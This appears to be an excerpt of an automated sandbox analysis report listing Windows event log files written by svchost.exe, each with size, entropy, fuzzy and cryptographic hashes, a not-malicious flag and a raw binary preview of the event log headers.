                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.0596696487276978
                                                Encrypted:false
                                                SSDEEP:384:Qh1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMpHMXmM+ZM6Zz:QeJ+
                                                MD5:F6D375E51341AC949A73803CF00B96E6
                                                SHA1:5DB3BF9A34145DD777EA9593DE3C8054B08A11D1
                                                SHA-256:EBDFA834049A08F8FC9B3DD35800233E75BDB480D59E548D7F4F3F2720B889F9
                                                SHA-512:1714A4243ECEB63E23583F31D3D6C161D8423E1AD2D1E1440545718E6DA879F74C2F03E5C21120ED826093777F6DEEEFEC57B913E1B4C1D74C0B8A473752460B
                                                Malicious:false
                                                Preview:ElfChnk.........................................X0.....!....................................................................B...........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................6(..............................................................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.241268628600426
                                                Encrypted:false
                                                SSDEEP:384:Thk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS1/:TBjdjP0csQqL
                                                MD5:602FD635C1BE2C0F087784BAE052554B
                                                SHA1:77EE62511C78BA6989DF77AC6B616422A44D7F54
                                                SHA-256:78FC5D1D71915650A8080B217B8B28F799B054F35C89AAB2C474DC4B9C3F0581
                                                SHA-512:8A66621CE4233D42AE83A0046A04628F4A88D91713C064944A61AFDF3F33D44E54E416A8441D1FFFDDCEA2E909761BBF151894881B4F93C0D238537939E21217
                                                Malicious:false
                                                Preview:ElfChnk...............................................j.........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&..............................A.......................................................**..............*5.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):70440
                                                Entropy (8bit):3.548884984798217
                                                Encrypted:false
                                                SSDEEP:384:DdIoLI0IWTI+I4ILINI4IuqIdWhDIEQAGxIHIFIWiIfeIT4IEIIInIhvohIG6If7:DR3WZxGkilAG
                                                MD5:E5F772BFFEE5889EA16CC35757457983
                                                SHA1:820EF1CD63E0B5C993EF96D479770F3B3BA4D6D7
                                                SHA-256:C754EBA131761AA89605F3E3AE3B68CCCB5B5AE18BC18E6763EA0FA3013F3607
                                                SHA-512:5A9E27389715666E87835AE4823B939A3D1ECEFA06D84EDA4E5EA6504533888F3AD9FDF2FC6559A940995D5CF00724822F903497572FDD5F57B9558ADB473B28
                                                Malicious:false
                                                Preview:ElfChnk.T...............T...................h... ....Z#:................................................................................................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................................................a........F..........1........................................)..........................**..............v..geM..........E!.F..............................................................,.......D...x.!........... ....@v..geM.....`....Z..`.......P........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s..z.?..nM.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s./.O.p.e.r.a.t.i.o.n.a.l.......a.............................................K...YM...?........C.:.........................explorer.exe...................**..............~..geM..........E!.F............
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.8023807109333921
                                                Encrypted:false
                                                SSDEEP:384:Fch6iIvcImIvITIQIoIoI3IEIMIoIBIOIRTIWeIZIEPdINI:FcoxXxP
                                                MD5:996D00E5A8B66706691FE697CCD68A7A
                                                SHA1:C90C99232451BAF2DCEB02C56C69CA9194390A9D
                                                SHA-256:95EF5245BEB2BBFD8EB8F5CE3A0C81869EF2AFACA54EF3445C3B144909C6A4B2
                                                SHA-512:FEA1D551151A622B151133814ECA8DE8EE4E3DA6D08F81CCE931FA7A64242E732A283E03A4B21EE922AF24F6FF0AF5EE2F26CDB7AA534583063C40F9C40DA0C8
                                                Malicious:false
                                                Preview:ElfChnk.....................................`"...#...l]....................................................................upp.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................^...............................................................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.999253421723821
                                                Encrypted:false
                                                SSDEEP:768:h4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH130:j
                                                MD5:11CAFE60067FAE9C5A304C7A7DAC0EB5
                                                SHA1:0E72987588CB8557C7CD00AD3D8956CDC0593C35
                                                SHA-256:1AFA765FD9A0D9659C2A02A266ED4FD303C82BD9AFF45F0E7167E335F91E042E
                                                SHA-512:764A5D459803B989800473821647907FF484C914778A8AE42257E4791C1C1369E5490AB9365665C257045A007907981E78C1F2B4D5652BCA777873439537E9D0
                                                Malicious:false
                                                Preview:ElfChnk.....................................0...@......~....................................................................u!..................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ......................................................................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:dBase III DBT, next free block index 1130785861, 1st item "**"
                                                Category:dropped
                                                Size (bytes):4784
                                                Entropy (8bit):3.9590412646130924
                                                Encrypted:false
                                                SSDEEP:96:ySNVaO8Mco1RywtayaByGIyeyhYshqyQX8ZQyq:ykV7JRywtayaByGIyeyhYskyQ8ZQyq
                                                MD5:EDD32D29F33E09CB0638E5049F50AEB8
                                                SHA1:D0EB0DEAF115C01DF456196D06DB10ADECDA661F
                                                SHA-256:9D500F621F8E0B5714FA3E0904BF403A591D5C74ED5CCA5B705BD33CC76C9C58
                                                SHA-512:98619DE0AF992F0DB57D9BBF6C40C5AE8F9247C4EB0218D2F12557FAC81708A4BF25478CC160F2B5BEE1901B5D070A1E92393F65957B14D29B914C4FFAB590B1
                                                Malicious:false
                                                Preview:ElfChnk.................P.......R....................<......................................................................o..]................8...........................=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...............................................................................**..h...P.........=.ZM..........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.435761335270744
                                                Encrypted:false
                                                SSDEEP:768:jpUOZc1jN2RkG6OQFAWAbYgO0TKLCjDjv5nTPC9:lZcy4AVKLCjDxTPw
                                                MD5:5326FF581E9596C4674ADCBEECAE50AA
                                                SHA1:96D2F4A031204AF8C378262CD458AEA904E6ED28
                                                SHA-256:551565214FC62778716C39CDD16E4D60D0F45410459DA67A4DF2E4CB1EA6B1E9
                                                SHA-512:E6C231FAEE2A4F76FCAF61993450FB26AB834E6F3B50A06C6498801BFB7191A2998F7FBBC7BFCC06127484787CE905483D3752C7FDAAB76D01F5DCF939738A70
                                                Malicious:false
                                                Preview:ElfChnk.........................................x...X..{.....................................................................g.p................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................O.......................&..........................................................._...................**..@...........H...ZM..........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.7602204514023913
                                                Encrypted:false
                                                SSDEEP:384:ChP8o8Z85848V8M8g8D8R8E8J83W1d8b8ut8l8:CR
                                                MD5:A71D2A716E4B8C87379C50F91A376243
                                                SHA1:B55D17BCD95C285812D918E820EDC513B8BC4373
                                                SHA-256:4C279C417D131982DEF275E92EC2EB1CCF985E5A5785B8989D28972A72AAD650
                                                SHA-512:4759EE9F1D1DF7F9C3452A40C1A58C66A8928378CC69B464944C4732BC5042BE1FFA81996F5943702CF7379C632B41081F9109421EB9A2243CCF06AF02BC45E8
                                                Malicious:false
                                                Preview:ElfChnk.........................................8!..=.......................................................................w]..........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......v...............................................................................**..(.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):3.7778192601657423
                                                Encrypted:false
                                                SSDEEP:1536:TXhCUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:TXQnS
                                                MD5:BC1869126DBA5DA294864FC0BC639FCA
                                                SHA1:021005C8E27BF6EAC1336EA1F1E76F31E3C1831F
                                                SHA-256:D90EE284FB6497E69E12A1E42F467572D4FF2192B58481A85F4468C1B46810D3
                                                SHA-512:E610240B9E07DF0386AF91F57B44DDA52847FC9A68AB80725D42A77BA8A583E6E8E4532394EC9C2C90AB3102B454F94F06DB1085944E60823A4CF8121FB8EA32
                                                Malicious:false
                                                Preview:ElfChnk.........*...............*...........(N...O...iD.......................................................................Lg................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........=......................................................O.......................**..............g5...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.4655200384785823
                                                Encrypted:false
                                                SSDEEP:768:m0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9O5vaP4eZiGai2niL9i5:ucE5
                                                MD5:EC1441AF347A3AEBD3C499EB77112044
                                                SHA1:062F0645AF0FF401308A0582362E6FE001C5444F
                                                SHA-256:97F7D6CF9603D2EF964F3D680F5902853382AE270ED6A37576364BD19E0A1C4A
                                                SHA-512:687D850AB0E8E4E75E484ED8E56658749F1331854AD6E28400538F050E3F372CA791023C87CE192D1417C70E63C0911E589AD9AE103CE30BB68A03EED414AABA
                                                Malicious:false
                                                Preview:ElfChnk.........@...............@............{..@}....c.....................................................................].................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F...........................*...........&................................................b..........%_..........................]...................**.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):88200
                                                Entropy (8bit):2.3098836212815925
                                                Encrypted:false
                                                SSDEEP:384:Hi8EdhNiwCrtrlXbaDQX/5pbiN5p6iN5yYXiN5pZiN5pIiN5pLiN5pZDiN5p+iNS:zEd6uEH6uEgh
                                                MD5:C17F7ECEC330DAB1DFE3DAA6AD3C44F7
                                                SHA1:F89E9E59D860DECD7E1FD054C13066BCF43E33DA
                                                SHA-256:C49D836EA0572D8D48F7FCBB8D92C4949E2B1BF44A009A4A4661519C26253601
                                                SHA-512:CA0B304C369BF5A7F8AADA07D5AD7CABFEAF74EA77BB264BE02EA01078DDB41E52DF33D2B3EE66CA07E6CA500F6E8C5CA489CCC1710FED46C516008B9C37F8E4
                                                Malicious:false
                                                Preview:ElfChnk.'.......1.......'.......1...........`L...N..........................................................................]z.4................^...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................7.......................&...............................................................................**..X...1........H..ZM..........E!&...............................................................L.......b.....!..................H..ZM.....`...V...`...p.......1....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.M.i.t.i.g.a.t.i.o.n.s........J...M..<.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.M.i.t.i.g.a.t.i.o.n.s./.K.e.r.n.e.l.M.o.d.e...!..^7...........j...........................................5.\.D.e.v.i.c.e.\.H.a.r.d.d.i.s.k.V.o.l.u.m.e.3.\.W.i
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.335307911754908
                                                Encrypted:false
                                                SSDEEP:384:NpQ/hDGCyCkCzCRCFCaC5ClCWQCyCiECLCtmWCTCYCflCdCEtC0C6gCwzChWCVJY:NpQ/dJjm6EIf8aG3e
                                                MD5:DEC13E419235D71E66C768AF61C819EB
                                                SHA1:C2601E3DF8A2D6E230D368CA0ECDD4BD11786D1A
                                                SHA-256:E9AAB8B817BC34F1B7009A6ABC439ACD1EFC991293198857268699458DF84552
                                                SHA-512:A78230EF0961E00D27B109F0EEF6DEDB9198759E1858C1DCB8C0E1032D48242C23726BB2931EE62A47A5C4D8434CD3BB537B0E6DF85D62653E3648A49A22AA3D
                                                Malicious:false
                                                Preview:ElfChnk.U...............U.............................w..................................................................... j..................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F...........................1[..............................&........>......................................y.......................................**..0...U.........Df..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.470554172113501
                                                Encrypted:false
                                                SSDEEP:1536:J0dBaHTmPeG68WdEWx/Tm3vaA1YNNd/vTGMk1o4X7BOBrc3gkWqJfECYqzGDXbJm:J0razmmG/WCWlTYvn1ANxvqMYo4XdOBH
                                                MD5:7C2BA3824E6FDFDC9B34997831CF5BA4
                                                SHA1:2F75B2D7953CA1F3F139E66C1C1C785DC11F6F0B
                                                SHA-256:902EC3153154EDF682DF6D35860B9D42B3C6016F787D02E0CC1D2371F3997192
                                                SHA-512:4BC9FFCB38302D4764B8632EC360FFDE079EF9818F6128BE07F6E89671A510A32AC93145F3FDB4CDBD6363390EAB157D8B164C2B04B86A36C3B93A08AE7A6B52
                                                Malicious:false
                                                Preview:ElfChnk......................................h...i.....n....................................................................n.2.................8.......................`...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...............................................................................**..8............C',_...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.4692142843323
                                                Encrypted:false
                                                SSDEEP:1536:mj9GvEkeLhw6IrKOu4zB5c63VJ7qhFRbw7ZGnCg7HZANhlPqizIUxKu/GFy9pUJF:mj9GvEkeLhw6IrKOu4zB5c63VJ7qhFRp
                                                MD5:882EF5776EC85740D5E17E47907A8A5D
                                                SHA1:A9659F309F10AD27550CCCBC7A1E1FD815155CCE
                                                SHA-256:02675149F56F0D3D965AA88A8D02773CAE09162BF60C64BB850CE9F8DB9E2AD7
                                                SHA-512:22D3905002411E6802BF28AD44D0921EFD6E2C289739D37DAFB00DF4DF9FFCB79521D64E4AEC5E399B9988931FF36679995F566A1924E48BAC6FAF6998243DC0
                                                Malicious:false
                                                Preview:ElfChnk.........#...............#...............(...Ak......................................................................@.TC................8.......................`...=...........................................................................................................................f...............?...........................m...................M...F...............................................................9...&...........................q.......I...................................Q.......**..............t...`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.5283250731919766
                                                Encrypted:false
                                                SSDEEP:384:YeUThv707s7a7v7yP7c7V7u7C7Z7C7M7n7K7G7d7Yp7PC787h7H7l73+7L7L7j7s:YeUTRVb
                                                MD5:9CB77B06F0F33B4BC7A638085998A032
                                                SHA1:04C57BABBE0B49A1AF70143FD2D9ED9071A14D5C
                                                SHA-256:AC3F98137ECCA65B1C5EBDF80B02F693E51AEA05B0B033CCB9A91C68778FF751
                                                SHA-512:488788029BCCEA4A3D2C8ED7492D895469BE0962884BC868F080E9CB479AF7ECDAF46E17FC08C9912B953E614E9DEE673DF994170931A99D9E28248117C6F4F8
                                                Malicious:false
                                                Preview:ElfChnk.....................................0y...{.._N......................................................................%.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................-@..............E9..m...................&.......................................................->......................**..8...........D...`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.268440759929627
                                                Encrypted:false
                                                SSDEEP:384:whc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauinJ:w6Ovc0S5UyEeDgLvqSX79K
                                                MD5:3E6903B4F529505011694E65B60A9154
                                                SHA1:05BC372041FD161154C35F843BFE439066F3A6C6
                                                SHA-256:E7BB68D43D88025FC2EC47BCA4957A08CEDF53FAA24751D95019CEF867223393
                                                SHA-512:8C700C45A3A01A79F9E0AB74BE5C0E718E231AAD4395F631A3DADA5C83E937EEBD0804DB0AF340A341440414ACD9293713B9ECB1A074F5E794CA21DFAB8D8CA0
                                                Malicious:false
                                                Preview:ElfChnk.........?...............?............q...s..>O......................................................................C.*.................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................6^..............................................w...............................**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.8178355996317889
                                                Encrypted:false
                                                SSDEEP:384:HhGuZumutu4uEu5uOuDuyb2uPu1uuuCeuDu7utu:HD
                                                MD5:FFB7825ACA321A39E4DD495EC4B7E3BE
                                                SHA1:A4EBE4617E4B98D93FDE5546893A4D29441B5F44
                                                SHA-256:F56C28857B0E8D30F34089306B9CCF6655F7ED073412E710AB10D747092DA0D2
                                                SHA-512:86D7C252C870B9362394CFA35B99AE257228E477A5346D8EF5B91E81F3A78CD008DC52A5F3D12C395EFB715F82B849CAD805AD71CF8C58514614F83EACB4F63E
                                                Malicious:false
                                                Preview:ElfChnk......................................"...$....u.....................................................................v..C................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......>...............................................................................**..............Wy.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.075909180265887
                                                Encrypted:false
                                                SSDEEP:384:NhzAsAvAaAmANSAbNAQAfCHA+AHchArAXATAvAjALATABAtGABS78jAOAqA4eAEp:NGCs2k64i/tpqA
                                                MD5:3A282029B03747ACB9F0A3496C717BD9
                                                SHA1:705490A345F883E024CC1641981A90DA6EDADCF5
                                                SHA-256:2A94A3FFC2481031F58367AB9F99D7972299D7F537520D2A6318B1BAA6B158F8
                                                SHA-512:F98AEB35B035B10B5C3CCA876E445D502AD84F66BE857B17EFE715983F9834ECAEDCCE5FF03914853115DE1644E9541FF111BD79A3607FA707735546A0C04AD4
                                                Malicious:false
                                                Preview:ElfChnk.....................................H.......}{........................................................................dE................<.......................d...=...........................................................................................................................f...............?...........................m...................M...F............................+.......................%..............&...............................................................................**..............|..3_...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):3.162414582102809
                                                Encrypted:false
                                                SSDEEP:384:khVpW2pPkpPrpPepP1pP4pPHpPypPxpPYpPDpPypPlpPct1pPnpPsLpPAWpPQpPT:k+tZb
                                                MD5:0D76B94CB673E07C9297775F6635BB30
                                                SHA1:42037C8D133B4CD395BA6BDC1108C30882248866
                                                SHA-256:7133E41E960AD5F46294DCBDC3FFE8CFCFD120213DF680017947924D3C013A8B
                                                SHA-512:9E5D104332631EDBCB8AF55BCEA2CD7B7EB34A0FE1DF226579E005A775840CDF05C86CCBEF902730138ED1A27347B4FB070FAF37046320740009CC11BAC11C33
                                                Malicious:false
                                                Preview:ElfChnk.........'...............'...................u..4.................................................................... ...........................................B...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...............................................................................**...............h{.`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.217583590897775
                                                Encrypted:false
                                                SSDEEP:384:3hUIpGcRpDvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBD:3YDoh1VLBCVz6t0o3ZeF9UBlG
                                                MD5:C5BB06A11AA8E33C5D2512146A14F414
                                                SHA1:BCA1D0ABD07806B4DDB34B4483B04B57A840CC26
                                                SHA-256:5A42653C87D73E415D15B08AE3511312F991238224022920D85CDEE43316C64A
                                                SHA-512:8FE28DAC0CEB3BBB462390492FA7623077448CCD58E04EE38C6CE9FF92FAD6647176DD61A628A4C03C3C5DEE9912D67375AE77865DE52D23B2B253C01C43FC86
                                                Malicious:false
